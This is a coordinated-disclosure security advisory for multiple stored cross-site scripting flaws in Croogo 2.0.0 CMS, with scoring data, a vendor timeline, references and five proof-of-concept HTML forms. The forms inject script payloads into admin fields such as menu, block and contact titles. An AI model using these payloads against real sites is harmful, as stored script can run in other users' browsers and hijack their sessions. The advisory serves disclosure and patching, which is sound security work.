CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
AI Score
Confidence
High
EPSS
Percentile
86.7%
Title: Croogo 2.0.0 Multiple Stored XSS Vulnerabilities
Advisory ID: ZSL-2014-5201
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 12.10.2014
Croogo is a free, open source, content management system for PHP, released under The MIT License. It is powered by CakePHP MVC framework.
Croogo version 2.0.0 suffers from multiple stored cross-site scripting vulnerabilities. Input passed to several POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
Fahad Ibnay Heylaal - <http://www.croogo.org>
2.0.0
Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
[26.07.2014] Vulnerabilities discovered.
[27.07.2014] Vendor contacted.
[27.07.2014] Vendor responds asking more details.
[27.07.2014] Sent details to the vendor.
[28.07.2014] Vendor confirms the issues promising patch.
[04.08.2014] Working with the vendor.
[07.08.2014] Fix developed.
[02.09.2014] Vendor releases version 2.1.0 to address these issues.
[12.10.2014] Coordinated public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://blog.croogo.org/blog/croogo-210-released>
[2] <http://osvdb.org/show/osvdb/113109>
[3] <http://osvdb.org/show/osvdb/113110>
[4] <http://osvdb.org/show/osvdb/113111>
[5] <http://osvdb.org/show/osvdb/113113>
[6] <http://www.exploit-db.com/exploits/34959/>
[7] <http://packetstormsecurity.com/files/128639>
[8] <http://cxsecurity.com/issue/WLB-2014100076>
[9] <http://www.securityfocus.com/bid/70413>
[10] <http://xforce.iss.net/xforce/xfdb/96991>
[11] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8577>
[12] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8577>
[12.10.2014] - Initial release
[14.10.2014] - Added reference [2], [3], [4], [5], [6], [7], [8] and [9]
[20.10.2014] - Added reference [10]
[03.11.2014] - Added reference [11] and [12]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<<<<html><body><p>
Croogo 2.0.0 Multiple Stored XSS Vulnerabilities
Vendor: Fahad Ibnay Heylaal
Product web page: http://www.croogo.org
Affected version: 2.0.0
Summary: Croogo is a free, open source, content management system
for PHP, released under The MIT License. It is powered by CakePHP
MVC framework.
Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
scripting vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - http://www.zeroscience.mk
Macedonian Information Security Research And Development Laboratory
Advisory ID: ZSL-2014-5201
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php
Vendor: http://blog.croogo.org/blog/croogo-210-released
26.07.2014
>>>
------------------------
(XSS #1)
--------
POST parameters:
- data[Contact][title]
------------------------
<!-- PoC - generated by Burp Suite Professional -->
</p>
<form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
<input name="_method" type="hidden" value="POST"/>
<input name="data[_Token][key]" type="hidden" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e"/>
<input name="data[Contact][id]" type="hidden" value=""/>
<input name="data[Contact][title]" type="hidden" value='"><script>alert("XSS");</script>'/>
<input name="data[Contact][alias]" type="hidden" value="test"/>
<input name="data[Contact][email]" type="hidden" value="[email protected]"/>
<input name="data[Contact][body]" type="hidden" value=""/>
<input name="data[Contact][name]" type="hidden" value=""/>
<input name="data[Contact][position]" type="hidden" value=""/>
<input name="data[Contact][address]" type="hidden" value=""/>
<input name="data[Contact][address2]" type="hidden" value=""/>
<input name="data[Contact][state]" type="hidden" value=""/>
<input name="data[Contact][country]" type="hidden" value=""/>
<input name="data[Contact][postcode]" type="hidden" value=""/>
<input name="data[Contact][phone]" type="hidden" value=""/>
<input name="data[Contact][fax]" type="hidden" value=""/>
<input name="data[Contact][message_status]" type="hidden" value="0"/>
<input name="data[Contact][message_archive]" type="hidden" value="0"/>
<input name="data[Contact][message_notify]" type="hidden" value="0"/>
<input name="data[Contact][message_spam_protection]" type="hidden" value="0"/>
<input name="data[Contact][message_captcha]" type="hidden" value="0"/>
<input name="data[Contact][status]" type="hidden" value="0"/>
<input name="data[_Token][fields]" type="hidden" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id"/>
<input name="data[_Token][unlocked]" type="hidden" value="apply"/>
<input type="submit" value="Submit form"/>
</form>
------------------------
(XSS #2)
--------
POST/PUT parameters:
- data[Block][title]
- data[Block][alias]
------------------------
<!-- PoC - generated by Burp Suite Professional -->
<form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
<input name="_method" type="hidden" value="PUT"/>
<input name="data[_Token][key]" type="hidden" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3"/>
<input name="data[Block][id]" type="hidden" value="10"/>
<input name="data[Block][title]" type="hidden" value='"><script>alert(2);</script>'/>
<input name="data[Block][alias]" type="hidden" value='"><script>alert(3);</script>'/>
<input name="data[Block][region_id]" type="hidden" value="3"/>
<input name="data[Block][body]" type="hidden" value="1"/>
<input name="data[Block][class]" type="hidden" value="1"/>
<input name="data[Block][element]" type="hidden" value="1"/>
<input name="data[Role][Role]" type="hidden" value=""/>
<input name="data[Block][visibility_paths]" type="hidden" value=""/>
<input name="data[Block][params]" type="hidden" value="1"/>
<input name="data[Block][status]" type="hidden" value="1"/>
<input name="data[Block][show_title]" type="hidden" value="0"/>
<input name="data[Block][show_title]" type="hidden" value="1"/>
<input name="data[Block][publish_start]" type="hidden" value="0000-00-00 00:00:00"/>
<input name="data[Block][publish_end]" type="hidden" value="0000-00-00 00:00:00"/>
<input name="data[_Token][fields]" type="hidden" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id"/>
<input name="data[_Token][unlocked]" type="hidden" value="apply"/>
<input type="submit" value="Submit form"/>
</form>
------------------------
(XSS #3)
--------
POST parameters:
- data[Region][title]
------------------------
<!-- PoC - generated by Burp Suite Professional -->
<form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
<input name="_method" type="hidden" value="POST"/>
<input name="data[_Token][key]" type="hidden" value="a7d62c8c34e2a6414c3657c43790645dfdd63735"/>
<input name="data[Region][id]" type="hidden" value=""/>
<input name="data[Region][title]" type="hidden" value='"><script>alert(11);</script>'/>
<input name="data[Region][alias]" type="hidden" value="1"/>
<input name="data[_Token][fields]" type="hidden" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id"/>
<input name="data[_Token][unlocked]" type="hidden" value="apply"/>
<input type="submit" value="Submit form"/>
</form>
------------------------
(XSS #4)
--------
POST parameters:
- data[Menu][title]
- data[Menu][alias]
------------------------
<!-- PoC - generated by Burp Suite Professional -->
<form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
<input name="_method" type="hidden" value="POST"/>
<input name="data[_Token][key]" type="hidden" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b"/>
<input name="data[Menu][id]" type="hidden" value=""/>
<input name="data[Menu][title]" type="hidden" value='"><script>alert(22);</script>'/>
<input name="data[Menu][alias]" type="hidden" value='"><script>alert(33);</script>'/>
<input name="data[Menu][description]" type="hidden" value="ZSL"/>
<input name="data[Menu][params]" type="hidden" value="1"/>
<input name="data[Menu][status]" type="hidden" value="1"/>
<input name="data[Menu][publish_start]" type="hidden" value="1"/>
<input name="data[Menu][publish_end]" type="hidden" value="1"/>
<input name="data[_Token][fields]" type="hidden" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id"/>
<input name="data[_Token][unlocked]" type="hidden" value="apply"/>
<input type="submit" value="Submit form"/>
</form>
------------------------
(XSS #5)
--------
POST parameters:
- data[Link][title]
------------------------
<!-- PoC - generated by Burp Suite Professional -->
<form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
<input name="_method" type="hidden" value="POST"/>
<input name="data[_Token][key]" type="hidden" value="736e7539497307010b8cb8e70c44ec8a9798d0fb"/>
<input name="data[Link][id]" type="hidden" value=""/>
<input name="data[Link][menu_id]" type="hidden" value="6"/>
<input name="data[Link][parent_id]" type="hidden" value=""/>
<input name="data[Link][title]" type="hidden" value='"><script>alert(1);</script>'/>
<input name="data[Link][link]" type="hidden" value="1"/>
<input name="data[Role][Role]" type="hidden" value=""/>
<input name="data[Link][class]" type="hidden" value="scriptalert1script"/>
<input name="data[Link][description]" type="hidden" value=""/>
<input name="data[Link][rel]" type="hidden" value=""/>
<input name="data[Link][target]" type="hidden" value=""/>
<input name="data[Link][params]" type="hidden" value=""/>
<input name="data[Link][status]" type="hidden" value="0"/>
<input name="data[Link][publish_start]" type="hidden" value=""/>
<input name="data[Link][publish_end]" type="hidden" value=""/>
<input name="data[_Token][fields]" type="hidden" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id"/>
<input name="data[_Token][unlocked]" type="hidden" value="apply"/>
<input type="submit" value="Submit form"/>
</form>
</body></html>